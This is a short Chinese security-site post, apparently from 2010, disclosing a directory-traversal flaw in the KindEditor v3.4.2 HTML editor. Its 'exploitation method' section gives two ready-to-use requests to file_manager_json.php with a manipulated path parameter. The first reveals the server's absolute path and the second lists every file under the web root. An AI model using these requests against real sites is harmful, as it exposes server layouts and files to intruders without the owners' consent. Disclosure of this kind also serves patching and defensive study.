热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Kindeditor遍历目录0DAY

发布时间:2010-05-31 10:21文章来源:未知文章作者:黑白前线 点击次数:
摘要:发布日期:2010-05.31 发布作者:子↘仪 影响版本:Kindeditor v3.4.2 官方地址: http://www.kindsoft.net/ 漏洞描述:KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等...
  1. 发布日期:2010-05.31  
  2. 发布作者:子↘仪
  3. 影响版本:Kindeditor v3.4.2 
  4. 官方地址:http://www.kindsoft.net/ 
  5. 漏洞描述: KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 KindEditor使用JavaScript编写,可以无缝的于Java、.NET、PHP、ASP等程序接合。 KindEditor非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用,2006年7月首次发布2.0以来,KindEditor依靠出色的用户体验和领先的技术不断扩大编辑器市场占有率,目前在国内已经成为最受欢迎的编辑器之一。

利用方法:

1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php


2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名

mulu.jpg

标签分类: 脚本漏洞 网站0day 遍历目录

上一篇:PHPCMS网站管理系统登录页面存在跨站漏洞
下一篇:Oscommerce Online Merchant v2.2 - Remote File Upload